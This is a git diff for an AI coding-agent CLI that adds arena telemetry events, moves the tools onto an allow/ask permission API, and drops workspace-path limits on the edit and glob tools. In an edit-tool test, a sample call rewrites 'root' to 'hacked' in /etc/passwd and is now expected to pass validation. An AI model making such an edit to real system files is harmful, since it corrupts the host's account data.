'', duration: event.duration_ms, success: 0, - message: event.error, + message: event.error_message, trace_id: event.response_id, properties: { auth_type: event.auth_type, model: event.model, prompt_id: event.prompt_id, + error_message: event.error_message, error_type: event.error_type, }, }); @@ -925,6 +940,61 @@ export class QwenLogger { this.flushIfNeeded(); } + // arena events + logArenaSessionStartedEvent(event: ArenaSessionStartedEvent): void { + const rumEvent = this.createActionEvent('arena', 'arena_session_started', { + properties: { + arena_session_id: event.arena_session_id, + model_ids: JSON.stringify(event.model_ids), + task_length: event.task_length, + }, + }); + + this.enqueueLogEvent(rumEvent); + this.flushIfNeeded(); + } + + logArenaAgentCompletedEvent(event: ArenaAgentCompletedEvent): void { + const rumEvent = this.createActionEvent('arena', 'arena_agent_completed', { + properties: { + arena_session_id: event.arena_session_id, + agent_session_id: event.agent_session_id, + agent_model_id: event.agent_model_id, + status: event.status, + duration_ms: event.duration_ms, + rounds: event.rounds, + total_tokens: event.total_tokens, + input_tokens: event.input_tokens, + output_tokens: event.output_tokens, + tool_calls: event.tool_calls, + successful_tool_calls: event.successful_tool_calls, + failed_tool_calls: event.failed_tool_calls, + }, + }); + + this.enqueueLogEvent(rumEvent); + this.flushIfNeeded(); + } + + logArenaSessionEndedEvent(event: ArenaSessionEndedEvent): void { + const rumEvent = this.createActionEvent('arena', 'arena_session_ended', { + properties: { + arena_session_id: event.arena_session_id, + status: event.status, + duration_ms: event.duration_ms, + display_backend: event.display_backend, + agent_count: event.agent_count, + completed_agents: event.completed_agents, + failed_agents: event.failed_agents, + cancelled_agents: event.cancelled_agents, + winner_model_id: event.winner_model_id, + }, + }); + + this.enqueueLogEvent(rumEvent); + 
this.flushIfNeeded(); + } + getProxyAgent() { const proxyUrl = this.config?.getProxy(); if (!proxyUrl) return undefined; diff --git a/packages/core/src/telemetry/tool-call-decision.ts b/packages/core/src/telemetry/tool-call-decision.ts index 167df10a3..b22a73c40 100644 --- a/packages/core/src/telemetry/tool-call-decision.ts +++ b/packages/core/src/telemetry/tool-call-decision.ts @@ -22,6 +22,8 @@ export function getDecisionFromOutcome( case ToolConfirmationOutcome.ProceedAlways: case ToolConfirmationOutcome.ProceedAlwaysServer: case ToolConfirmationOutcome.ProceedAlwaysTool: + case ToolConfirmationOutcome.ProceedAlwaysProject: + case ToolConfirmationOutcome.ProceedAlwaysUser: return ToolCallDecision.AUTO_ACCEPT; case ToolConfirmationOutcome.ModifyWithEditor: return ToolCallDecision.MODIFY; diff --git a/packages/core/src/telemetry/types.ts b/packages/core/src/telemetry/types.ts index d9c6b535d..4f0afea42 100644 --- a/packages/core/src/telemetry/types.ts +++ b/packages/core/src/telemetry/types.ts @@ -10,7 +10,7 @@ import type { ApprovalMode } from '../config/config.js'; import type { CompletedToolCall } from '../core/coreToolScheduler.js'; import { DiscoveredMCPTool } from '../tools/mcp-tool.js'; import type { FileDiff } from '../tools/tools.js'; -import { AuthType } from '../core/contentGenerator.js'; +import type { AuthType } from '../core/contentGenerator.js'; import { getDecisionFromOutcome, ToolCallDecision, @@ -35,55 +35,61 @@ export class StartSessionEvent implements BaseTelemetryEvent { 'event.timestamp': string; session_id: string; model: string; - embedding_model: string; sandbox_enabled: boolean; - core_tools_enabled: string; + core_tools_enabled?: string; approval_mode: string; - api_key_enabled: boolean; - vertex_ai_enabled: boolean; debug_enabled: boolean; + truncate_tool_output_threshold: number; + truncate_tool_output_lines: number; mcp_servers: string; telemetry_enabled: boolean; - telemetry_log_user_prompts_enabled: boolean; 
file_filtering_respect_git_ignore: boolean; mcp_servers_count: number; mcp_tools_count?: number; mcp_tools?: string; output_format: OutputFormat; + hooks?: string; + ide_enabled: boolean; + interactive_shell_enabled: boolean; skills?: string; subagents?: string; constructor(config: Config) { - const generatorConfig = config.getContentGeneratorConfig(); const mcpServers = config.getMcpServers(); const toolRegistry = config.getToolRegistry(); - let useGemini = false; - let useVertex = false; - if (generatorConfig && generatorConfig.authType) { - useGemini = generatorConfig.authType === AuthType.USE_GEMINI; - useVertex = generatorConfig.authType === AuthType.USE_VERTEX_AI; - } - this['event.name'] = 'cli_config'; this.session_id = config.getSessionId(); this.model = config.getModel(); - this.embedding_model = config.getEmbeddingModel(); this.sandbox_enabled = typeof config.getSandbox() === 'string' || !!config.getSandbox(); - this.core_tools_enabled = (config.getCoreTools() ?? []).join(','); + this.core_tools_enabled = ( + config.getPermissionManager?.()?.getAllowRawStrings() ?? + config.getCoreTools() ?? + [] + ).join(','); this.approval_mode = config.getApprovalMode(); - this.api_key_enabled = useGemini || useVertex; - this.vertex_ai_enabled = useVertex; this.debug_enabled = config.getDebugMode(); + this.truncate_tool_output_threshold = + config.getTruncateToolOutputThreshold(); + this.truncate_tool_output_lines = config.getTruncateToolOutputLines(); this.mcp_servers = mcpServers ? Object.keys(mcpServers).join(',') : ''; this.telemetry_enabled = config.getTelemetryEnabled(); - this.telemetry_log_user_prompts_enabled = - config.getTelemetryLogPromptsEnabled(); this.file_filtering_respect_git_ignore = config.getFileFilteringRespectGitIgnore(); this.mcp_servers_count = mcpServers ? 
Object.keys(mcpServers).length : 0; this.output_format = config.getOutputFormat(); + this.ide_enabled = config.getIdeMode(); + this.interactive_shell_enabled = config.getShouldUseNodePtyShell(); + + const hookSystem = config.getHookSystem(); + if (hookSystem) { + const allHooks = hookSystem.getAllHooks(); + const uniqueEventNames = [...new Set(allHooks.map((h) => h.eventName))]; + if (uniqueEventNames.length > 0) { + this.hooks = uniqueEventNames.join(','); + } + } if (toolRegistry) { const mcpTools = toolRegistry @@ -148,6 +154,18 @@ export class UserPromptEvent implements BaseTelemetryEvent { } } +export class UserRetryEvent implements BaseTelemetryEvent { + 'event.name': 'user_retry'; + 'event.timestamp': string; + prompt_id: string; + + constructor(prompt_id: string) { + this['event.name'] = 'user_retry'; + this['event.timestamp'] = new Date().toISOString(); + this.prompt_id = prompt_id; + } +} + export class ToolCallEvent implements BaseTelemetryEvent { 'event.name': 'tool_call'; 'event.timestamp': string; @@ -237,33 +255,36 @@ export class ApiErrorEvent implements BaseTelemetryEvent { 'event.timestamp': string; // ISO 8601 response_id?: string; model: string; - error: string; - error_type?: string; - status_code?: number | string; duration_ms: number; prompt_id: string; auth_type?: string; + // Human-readable error message (e.g. "Request failed with status 429") + error_message: string; + // Error class or category (e.g. "RateLimitError", "invalid_request_error") + error_type?: string; + // HTTP status code from the API response (e.g. 
429, 500) + status_code?: number | string; - constructor( - response_id: string | undefined, - model: string, - error: string, - duration_ms: number, - prompt_id: string, - auth_type?: string, - error_type?: string, - status_code?: number | string, - ) { + constructor(opts: { + responseId?: string; + model: string; + durationMs: number; + promptId: string; + authType?: string; + errorMessage: string; + errorType?: string; + statusCode?: number | string; + }) { this['event.name'] = 'api_error'; this['event.timestamp'] = new Date().toISOString(); - this.response_id = response_id; - this.model = model; - this.error = error; - this.error_type = error_type; - this.status_code = status_code; - this.duration_ms = duration_ms; - this.prompt_id = prompt_id; - this.auth_type = auth_type; + this.response_id = opts.responseId; + this.model = opts.model; + this.duration_ms = opts.durationMs; + this.prompt_id = opts.promptId; + this.auth_type = opts.authType; + this.error_message = opts.errorMessage; + this.error_type = opts.errorType; + this.status_code = opts.statusCode; } } @@ -857,7 +878,128 @@ export type TelemetryEvent = | ModelSlashCommandEvent | AuthEvent | SkillLaunchEvent - | UserFeedbackEvent; + | UserFeedbackEvent + | ArenaSessionStartedEvent + | ArenaAgentCompletedEvent + | ArenaSessionEndedEvent; + +// ─── Arena Telemetry Events ──────────────────────────────────── + +export interface ArenaSessionStartedEvent extends BaseTelemetryEvent { + 'event.name': 'arena_session_started'; + arena_session_id: string; + model_ids: string[]; + task_length: number; +} + +export function makeArenaSessionStartedEvent({ + arena_session_id, + model_ids, + task_length, +}: Omit): ArenaSessionStartedEvent { + return { + 'event.name': 'arena_session_started', + 'event.timestamp': new Date().toISOString(), + arena_session_id, + model_ids, + task_length, + }; +} + +export type ArenaAgentCompletedStatus = 'completed' | 'failed' | 'cancelled'; + +export interface ArenaAgentCompletedEvent 
extends BaseTelemetryEvent { + 'event.name': 'arena_agent_completed'; + arena_session_id: string; + agent_session_id: string; + agent_model_id: string; + status: ArenaAgentCompletedStatus; + duration_ms: number; + rounds: number; + total_tokens: number; + input_tokens: number; + output_tokens: number; + tool_calls: number; + successful_tool_calls: number; + failed_tool_calls: number; +} + +export function makeArenaAgentCompletedEvent({ + arena_session_id, + agent_session_id, + agent_model_id, + status, + duration_ms, + rounds, + total_tokens, + input_tokens, + output_tokens, + tool_calls, + successful_tool_calls, + failed_tool_calls, +}: Omit): ArenaAgentCompletedEvent { + return { + 'event.name': 'arena_agent_completed', + 'event.timestamp': new Date().toISOString(), + arena_session_id, + agent_session_id, + agent_model_id, + status, + duration_ms, + rounds, + total_tokens, + input_tokens, + output_tokens, + tool_calls, + successful_tool_calls, + failed_tool_calls, + }; +} + +export type ArenaSessionEndedStatus = + | 'selected' + | 'discarded' + | 'failed' + | 'cancelled'; + +export interface ArenaSessionEndedEvent extends BaseTelemetryEvent { + 'event.name': 'arena_session_ended'; + arena_session_id: string; + status: ArenaSessionEndedStatus; + duration_ms: number; + display_backend?: string; + agent_count: number; + completed_agents: number; + failed_agents: number; + cancelled_agents: number; + winner_model_id?: string; +} + +export function makeArenaSessionEndedEvent({ + arena_session_id, + status, + duration_ms, + display_backend, + agent_count, + completed_agents, + failed_agents, + cancelled_agents, + winner_model_id, +}: Omit): ArenaSessionEndedEvent { + return { + 'event.name': 'arena_session_ended', + 'event.timestamp': new Date().toISOString(), + arena_session_id, + status, + duration_ms, + display_backend, + agent_count, + completed_agents, + failed_agents, + cancelled_agents, + winner_model_id, + }; +} export class ExtensionDisableEvent implements 
BaseTelemetryEvent { 'event.name': 'extension_disable'; diff --git a/packages/core/src/telemetry/uiTelemetry.test.ts b/packages/core/src/telemetry/uiTelemetry.test.ts index e45032619..37542273a 100644 --- a/packages/core/src/telemetry/uiTelemetry.test.ts +++ b/packages/core/src/telemetry/uiTelemetry.test.ts @@ -301,7 +301,7 @@ describe('UiTelemetryService', () => { 'event.name': EVENT_API_ERROR, model: 'gemini-2.5-pro', duration_ms: 300, - error: 'Something went wrong', + error_message: 'Something went wrong', } as ApiErrorEvent & { 'event.name': typeof EVENT_API_ERROR }; service.addEvent(event); @@ -342,7 +342,7 @@ describe('UiTelemetryService', () => { 'event.name': EVENT_API_ERROR, model: 'gemini-2.5-pro', duration_ms: 300, - error: 'Something went wrong', + error_message: 'Something went wrong', } as ApiErrorEvent & { 'event.name': typeof EVENT_API_ERROR }; service.addEvent(responseEvent); diff --git a/packages/core/src/telemetry/uiTelemetry.ts b/packages/core/src/telemetry/uiTelemetry.ts index 0f8f2146c..a7361f038 100644 --- a/packages/core/src/telemetry/uiTelemetry.ts +++ b/packages/core/src/telemetry/uiTelemetry.ts @@ -119,6 +119,7 @@ const createInitialMetrics = (): SessionMetrics => ({ export class UiTelemetryService extends EventEmitter { #metrics: SessionMetrics = createInitialMetrics(); #lastPromptTokenCount = 0; + #lastCachedContentTokenCount = 0; addEvent(event: UiEvent) { switch (event['event.name']) { @@ -158,12 +159,21 @@ export class UiTelemetryService extends EventEmitter { }); } + getLastCachedContentTokenCount(): number { + return this.#lastCachedContentTokenCount; + } + + setLastCachedContentTokenCount(count: number): void { + this.#lastCachedContentTokenCount = count; + } + /** * Resets metrics to the initial state (used when resuming a session). 
*/ reset(): void { this.#metrics = createInitialMetrics(); this.#lastPromptTokenCount = 0; + this.#lastCachedContentTokenCount = 0; this.emit('update', { metrics: this.#metrics, lastPromptTokenCount: this.#lastPromptTokenCount, diff --git a/packages/core/src/test-utils/mock-tool.ts b/packages/core/src/test-utils/mock-tool.ts index 75bdf26c5..0e3cf293d 100644 --- a/packages/core/src/test-utils/mock-tool.ts +++ b/packages/core/src/test-utils/mock-tool.ts @@ -13,6 +13,7 @@ import type { ToolInvocation, ToolResult, } from '../tools/tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { BaseDeclarativeTool, BaseToolInvocation, @@ -25,10 +26,10 @@ interface MockToolOptions { description?: string; canUpdateOutput?: boolean; isOutputMarkdown?: boolean; - shouldConfirmExecute?: ( - params: { [key: string]: unknown }, + getDefaultPermission?: () => Promise; + getConfirmationDetails?: ( signal: AbortSignal, - ) => Promise; + ) => Promise; execute?: ( params: { [key: string]: unknown }, signal?: AbortSignal, @@ -59,10 +60,14 @@ class MockToolInvocation extends BaseToolInvocation< } } - override shouldConfirmExecute( + override getDefaultPermission(): Promise { + return this.tool.getDefaultPermission(); + } + + override getConfirmationDetails( abortSignal: AbortSignal, - ): Promise { - return this.tool.shouldConfirmExecute(this.params, abortSignal); + ): Promise { + return this.tool.getConfirmationDetails(abortSignal); } getDescription(): string { @@ -77,10 +82,10 @@ export class MockTool extends BaseDeclarativeTool< { [key: string]: unknown }, ToolResult > { - shouldConfirmExecute: ( - params: { [key: string]: unknown }, + getDefaultPermission: () => Promise; + getConfirmationDetails: ( signal: AbortSignal, - ) => Promise; + ) => Promise; execute: ( params: { [key: string]: unknown }, signal?: AbortSignal, @@ -98,10 +103,22 @@ export class MockTool extends BaseDeclarativeTool< options.canUpdateOutput ?? 
false, ); - if (options.shouldConfirmExecute) { - this.shouldConfirmExecute = options.shouldConfirmExecute; + if (options.getDefaultPermission) { + this.getDefaultPermission = options.getDefaultPermission; } else { - this.shouldConfirmExecute = () => Promise.resolve(false); + this.getDefaultPermission = () => + Promise.resolve('allow' as PermissionDecision); + } + + if (options.getConfirmationDetails) { + this.getConfirmationDetails = options.getConfirmationDetails; + } else { + this.getConfirmationDetails = () => { + throw new Error( + `${this.name} returned 'ask' from getDefaultPermission() ` + + `but does not implement getConfirmationDetails().`, + ); + }; } if (options.execute) { @@ -122,7 +139,10 @@ export class MockTool extends BaseDeclarativeTool< } } -export const MOCK_TOOL_SHOULD_CONFIRM_EXECUTE = () => +export const MOCK_TOOL_GET_DEFAULT_PERMISSION = () => + Promise.resolve('ask' as PermissionDecision); + +export const MOCK_TOOL_GET_CONFIRMATION_DETAILS = () => Promise.resolve({ type: 'exec' as const, title: 'Confirm mockTool', @@ -152,22 +172,23 @@ export class MockModifiableToolInvocation extends BaseToolInvocation< ); } - override async shouldConfirmExecute( + override async getDefaultPermission(): Promise { + return this.tool.shouldConfirm ? 
'ask' : 'allow'; + } + + override async getConfirmationDetails( _abortSignal: AbortSignal, - ): Promise { - if (this.tool.shouldConfirm) { - return { - type: 'edit', - title: 'Confirm Mock Tool', - fileName: 'test.txt', - filePath: 'test.txt', - fileDiff: 'diff', - originalContent: 'originalContent', - newContent: 'newContent', - onConfirm: async () => {}, - }; - } - return false; + ): Promise { + return { + type: 'edit', + title: 'Confirm Mock Tool', + fileName: 'test.txt', + filePath: 'test.txt', + fileDiff: 'diff', + originalContent: 'originalContent', + newContent: 'newContent', + onConfirm: async () => {}, + }; } getDescription(): string { diff --git a/packages/core/src/tools/askUserQuestion.test.ts b/packages/core/src/tools/askUserQuestion.test.ts index f9aabc2d9..9e8f36663 100644 --- a/packages/core/src/tools/askUserQuestion.test.ts +++ b/packages/core/src/tools/askUserQuestion.test.ts @@ -100,8 +100,8 @@ describe('AskUserQuestionTool', () => { }); }); - describe('shouldConfirmExecute', () => { - it('should return confirmation details in interactive mode', async () => { + describe('getDefaultPermission and getConfirmationDetails', () => { + it('should return ask permission and confirmation details in interactive mode', async () => { const params = { questions: [ { @@ -117,19 +117,20 @@ describe('AskUserQuestionTool', () => { }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - - expect(confirmation).not.toBe(false); - if (confirmation && confirmation.type === 'ask_user_question') { - expect(confirmation.type).toBe('ask_user_question'); + expect(confirmation.type).toBe('ask_user_question'); + if (confirmation.type === 'ask_user_question') { expect(confirmation.questions).toEqual(params.questions); 
expect(confirmation.onConfirm).toBeDefined(); } }); - it('should return false in non-interactive mode', async () => { + it('should return allow permission in non-interactive mode', async () => { (mockConfig.isInteractive as Mock).mockReturnValue(false); const params = { @@ -147,11 +148,8 @@ describe('AskUserQuestionTool', () => { }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - - expect(confirmation).toBe(false); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('allow'); }); }); @@ -196,14 +194,12 @@ describe('AskUserQuestionTool', () => { }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - if (confirmation !== false) { - // Simulate user cancellation - await confirmation.onConfirm(ToolConfirmationOutcome.Cancel); - } + // Simulate user cancellation + await confirmation.onConfirm(ToolConfirmationOutcome.Cancel); const result = await invocation.execute(new AbortController().signal); expect(result.llmContent).toContain('declined to answer'); @@ -234,19 +230,17 @@ describe('AskUserQuestionTool', () => { }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - if (confirmation !== false) { - // Simulate user providing answers - await confirmation.onConfirm(ToolConfirmationOutcome.ProceedOnce, { - answers: { - '0': 'React', - '1': 'TypeScript', - }, - }); - } + // Simulate user providing answers + await confirmation.onConfirm(ToolConfirmationOutcome.ProceedOnce, { + answers: { + '0': 'React', + '1': 'TypeScript', + }, + }); const result = await invocation.execute(new AbortController().signal); diff --git a/packages/core/src/tools/askUserQuestion.ts 
b/packages/core/src/tools/askUserQuestion.ts index e1c6af26e..d33eb0fb7 100644 --- a/packages/core/src/tools/askUserQuestion.ts +++ b/packages/core/src/tools/askUserQuestion.ts @@ -9,6 +9,7 @@ import type { ToolConfirmationPayload, ToolResult, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { BaseDeclarativeTool, BaseToolInvocation, @@ -154,20 +155,26 @@ class AskUserQuestionToolInvocation extends BaseToolInvocation< return `Ask user ${questionCount} question${questionCount > 1 ? 's' : ''}`; } - override async shouldConfirmExecute( - _abortSignal: AbortSignal, - ): Promise { - // Check if we're in a mode that supports user interaction - // ACP mode (VSCode extension, etc.) uses non-interactive mode but can still collect user input + /** + * ask_user_question always requires user confirmation so the user can + * provide answers. In non-interactive mode without ACP support, we skip + * confirmation (and subsequently skip execution). + */ + override async getDefaultPermission(): Promise { const isAcpMode = this._config.getExperimentalZedIntegration() || this._config.getInputFormat() === InputFormat.STREAM_JSON; if (!this._config.isInteractive() && !isAcpMode) { - // In non-interactive mode without ACP support, we cannot collect user input - return false; + // Non-interactive + no ACP: skip entirely + return 'allow'; } + return 'ask'; + } + override async getConfirmationDetails( + _abortSignal: AbortSignal, + ): Promise { const details: ToolAskUserQuestionConfirmationDetails = { type: 'ask_user_question', title: 'Please answer the following question(s):', diff --git a/packages/core/src/tools/edit.test.ts b/packages/core/src/tools/edit.test.ts index 21ee04244..c67520385 100644 --- a/packages/core/src/tools/edit.test.ts +++ b/packages/core/src/tools/edit.test.ts @@ -230,20 +230,18 @@ describe('EditTool', () => { ); }); - it('should return error for path outside root', () => { + it('should allow path outside root (external 
path support)', () => { const params: EditToolParams = { file_path: path.join(tempDir, 'outside-root.txt'), old_string: 'old', new_string: 'new', }; const error = tool.validateToolParams(params); - expect(error).toContain( - 'File path must be within one of the workspace directories', - ); + expect(error).toBeNull(); }); }); - describe('shouldConfirmExecute', () => { + describe('getConfirmationDetails', () => { const testFile = 'edit_me.txt'; let filePath: string; @@ -268,7 +266,7 @@ describe('EditTool', () => { new_string: 'new', }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); expect(confirmation).toEqual( @@ -280,39 +278,7 @@ describe('EditTool', () => { ); }); - it('should return false and skip confirmation when approval mode is AUTO_EDIT', async () => { - fs.writeFileSync(filePath, 'some old content here'); - (mockConfig.getApprovalMode as Mock).mockReturnValue( - ApprovalMode.AUTO_EDIT, - ); - const params: EditToolParams = { - file_path: filePath, - old_string: 'old', - new_string: 'new', - }; - const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).toBe(false); - }); - - it('should return false and skip confirmation when approval mode is YOLO', async () => { - fs.writeFileSync(filePath, 'some old content here'); - (mockConfig.getApprovalMode as Mock).mockReturnValue(ApprovalMode.YOLO); - const params: EditToolParams = { - file_path: filePath, - old_string: 'old', - new_string: 'new', - }; - const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).toBe(false); - }); - - it('should return false if old_string is not found', async () => { + it('should throw if old_string is not found', async () => { 
fs.writeFileSync(filePath, 'some content here'); const params: EditToolParams = { file_path: filePath, @@ -320,13 +286,12 @@ describe('EditTool', () => { new_string: 'new', }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).toBe(false); + await expect( + invocation.getConfirmationDetails(new AbortController().signal), + ).rejects.toThrow(); }); - it('should return false if multiple occurrences of old_string are found', async () => { + it('should throw if multiple occurrences of old_string are found', async () => { fs.writeFileSync(filePath, 'old old content here'); const params: EditToolParams = { file_path: filePath, @@ -334,10 +299,9 @@ describe('EditTool', () => { new_string: 'new', }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).toBe(false); + await expect( + invocation.getConfirmationDetails(new AbortController().signal), + ).rejects.toThrow(); }); it('should request confirmation for creating a new file (empty old_string)', async () => { @@ -349,7 +313,7 @@ describe('EditTool', () => { new_string: 'new file content', }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); expect(confirmation).toEqual( @@ -383,7 +347,7 @@ describe('EditTool', () => { }); await expect( - invocation.shouldConfirmExecute(abortController.signal), + invocation.getConfirmationDetails(abortController.signal), ).rejects.toBe(abortError); calculateSpy.mockRestore(); @@ -903,17 +867,14 @@ describe('EditTool', () => { expect(tool.validateToolParams(validPath)).toBeNull(); }); - it('should reject paths outside workspace root', () => { - const invalidPath = { + it('should allow paths outside workspace root (external path 
support)', () => { + const externalPath = { file_path: '/etc/passwd', old_string: 'root', new_string: 'hacked', }; - const error = tool.validateToolParams(invalidPath); - expect(error).toContain( - 'File path must be within one of the workspace directories', - ); - expect(error).toContain(rootDir); + const error = tool.validateToolParams(externalPath); + expect(error).toBeNull(); }); }); @@ -948,7 +909,7 @@ describe('EditTool', () => { }); const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); diff --git a/packages/core/src/tools/edit.ts b/packages/core/src/tools/edit.ts index 474a6aace..e5b1480b9 100644 --- a/packages/core/src/tools/edit.ts +++ b/packages/core/src/tools/edit.ts @@ -14,13 +14,14 @@ import type { ToolLocation, ToolResult, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { BaseDeclarativeTool, Kind, ToolConfirmationOutcome } from './tools.js'; import { ToolErrorType } from './tool-error.js'; import { makeRelative, shortenPath } from '../utils/paths.js'; import { isNodeError } from '../utils/errors.js'; import type { Config } from '../config/config.js'; import { ApprovalMode } from '../config/config.js'; -import { FileEncoding } from '../services/fileSystemService.js'; +import { FileEncoding, needsUtf8Bom } from '../services/fileSystemService.js'; import { DEFAULT_DIFF_OPTIONS, getDiffStat } from './diffOptions.js'; import { ReadFileTool } from './read-file.js'; import { ToolNames, ToolDisplayNames } from './tool-names.js'; @@ -38,7 +39,6 @@ import type { } from './modifiable-tool.js'; import { IdeClient } from '../ide/ide-client.js'; import { safeLiteralReplace } from '../utils/textUtils.js'; -import { createDebugLogger } from '../utils/debugLogger.js'; import { countOccurrences, extractEditSnippet, @@ -46,8 +46,6 @@ import { normalizeEditStrings, } from 
'../utils/editHelper.js'; -const debugLogger = createDebugLogger('EDIT'); - export function applyReplacement( currentContent: string | null, oldString: string, @@ -263,17 +261,18 @@ class EditToolInvocation implements ToolInvocation { } /** - * Handles the confirmation prompt for the Edit tool in the CLI. - * It needs to calculate the diff to show the user. + * Edit operations always need user confirmation (unless overridden by PM or ApprovalMode). */ - async shouldConfirmExecute( - abortSignal: AbortSignal, - ): Promise { - const mode = this.config.getApprovalMode(); - if (mode === ApprovalMode.AUTO_EDIT || mode === ApprovalMode.YOLO) { - return false; - } + async getDefaultPermission(): Promise { + return 'ask'; + } + /** + * Constructs the edit diff confirmation details. + */ + async getConfirmationDetails( + abortSignal: AbortSignal, + ): Promise { let editData: CalculatedEdit; try { editData = await this.calculateEdit(this.params); @@ -282,13 +281,11 @@ class EditToolInvocation implements ToolInvocation { throw error; } const errorMsg = error instanceof Error ? error.message : String(error); - debugLogger.warn(`Error preparing edit: ${errorMsg}`); - return false; + throw new Error(`Error preparing edit: ${errorMsg}`); } if (editData.error) { - debugLogger.warn(`Error: ${editData.error.display}`); - return false; + throw new Error(`Edit error: ${editData.error.display}`); } const fileName = path.basename(this.params.file_path); @@ -322,8 +319,6 @@ class EditToolInvocation implements ToolInvocation { if (ideConfirmation) { const result = await ideConfirmation; if (result.status === 'accepted' && result.content) { - // TODO(chrstn): See https://github.com/google-gemini/gemini-cli/pull/5618#discussion_r2255413084 - // for info on a possible race condition where the file is modified on disk while being edited. this.params.old_string = editData.currentContent ?? 
''; this.params.new_string = result.content; } @@ -397,8 +392,14 @@ class EditToolInvocation implements ToolInvocation { // For new files, apply default file encoding setting // For existing files, preserve the original encoding (BOM and charset) if (editData.isNewFile) { - const useBOM = - this.config.getDefaultFileEncoding() === FileEncoding.UTF8_BOM; + const userEncoding = this.config.getDefaultFileEncoding(); + let useBOM = false; + if (userEncoding === FileEncoding.UTF8_BOM) { + useBOM = true; + } else if (userEncoding === undefined) { + // No explicit setting: auto-detect (e.g. .ps1 on non-UTF-8 Windows) + useBOM = needsUtf8Bom(this.params.file_path); + } await this.config.getFileSystemService().writeTextFile({ path: this.params.file_path, content: editData.newContent, @@ -577,12 +578,6 @@ Expectation for required parameters: return `File path must be absolute: ${params.file_path}`; } - const workspaceContext = this.config.getWorkspaceContext(); - if (!workspaceContext.isPathWithinWorkspace(params.file_path)) { - const directories = workspaceContext.getDirectories(); - return `File path must be within one of the workspace directories: ${directories.join(', ')}`; - } - return null; } diff --git a/packages/core/src/tools/exitPlanMode.test.ts b/packages/core/src/tools/exitPlanMode.test.ts index 8f5e41634..51de9dda5 100644 --- a/packages/core/src/tools/exitPlanMode.test.ts +++ b/packages/core/src/tools/exitPlanMode.test.ts @@ -119,7 +119,9 @@ describe('ExitPlanModeTool', () => { expect(invocation).toBeDefined(); expect(invocation.params).toEqual(params); - const confirmation = await invocation.shouldConfirmExecute(signal); + expect(await invocation.getDefaultPermission()).toBe('ask'); + + const confirmation = await invocation.getConfirmationDetails(signal); expect(confirmation).toMatchObject({ type: 'plan', title: 'Would you like to proceed?', @@ -154,7 +156,7 @@ describe('ExitPlanModeTool', () => { const signal = new AbortController().signal; const invocation = 
tool.build(params); - const confirmation = await invocation.shouldConfirmExecute(signal); + const confirmation = await invocation.getConfirmationDetails(signal); if (confirmation) { expect(confirmation.type).toBe('plan'); @@ -178,7 +180,7 @@ describe('ExitPlanModeTool', () => { const signal = new AbortController().signal; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute(signal); + const confirmation = await invocation.getConfirmationDetails(signal); if (confirmation) { await confirmation.onConfirm(ToolConfirmationOutcome.Cancel); diff --git a/packages/core/src/tools/exitPlanMode.ts b/packages/core/src/tools/exitPlanMode.ts index 0f06add54..cc5894766 100644 --- a/packages/core/src/tools/exitPlanMode.ts +++ b/packages/core/src/tools/exitPlanMode.ts @@ -5,6 +5,7 @@ */ import type { ToolPlanConfirmationDetails, ToolResult } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { BaseDeclarativeTool, BaseToolInvocation, @@ -76,7 +77,14 @@ class ExitPlanModeToolInvocation extends BaseToolInvocation< return 'Plan:'; } - override async shouldConfirmExecute( + /** + * Plan mode exit always requires user confirmation. 
+ */ + override async getDefaultPermission(): Promise { + return 'ask'; + } + + override async getConfirmationDetails( _abortSignal: AbortSignal, ): Promise { const details: ToolPlanConfirmationDetails = { diff --git a/packages/core/src/tools/glob.test.ts b/packages/core/src/tools/glob.test.ts index b6a04c35f..dc1537930 100644 --- a/packages/core/src/tools/glob.test.ts +++ b/packages/core/src/tools/glob.test.ts @@ -244,13 +244,14 @@ describe('GlobTool', () => { expect(result.llmContent).toContain('Found 2 file(s)'); }); - it('should return error if path is outside workspace', async () => { - // Bypassing validation to test execute method directly - vi.spyOn(globTool, 'validateToolParams').mockReturnValue(null); - const params: GlobToolParams = { pattern: '*.txt', path: '/etc' }; + it('should allow path outside workspace (external path support)', async () => { + const params: GlobToolParams = { pattern: '*.txt', path: '/tmp' }; const invocation = globTool.build(params); + // External path is now allowed - it should not return a workspace error const result = await invocation.execute(abortSignal); - expect(result.returnDisplay).toBe('Error: Path is not within workspace'); + expect(result.returnDisplay).not.toContain( + 'Path is not within workspace', + ); }); it('should return a GLOB_EXECUTION_ERROR on glob failure', async () => { @@ -322,9 +323,8 @@ describe('GlobTool', () => { pattern: '*.txt', path: '../../../../../../../../../../tmp', // Definitely outside }; - expect(specificGlobTool.validateToolParams(paramsOutside)).toContain( - 'Path is not within workspace', - ); + // External paths are now allowed (permission handled at runtime) + expect(specificGlobTool.validateToolParams(paramsOutside)).toBeNull(); }); it('should return error if specified search path does not exist', async () => { @@ -351,9 +351,8 @@ describe('GlobTool', () => { const invalidPath = { pattern: '*.ts', path: '../..' 
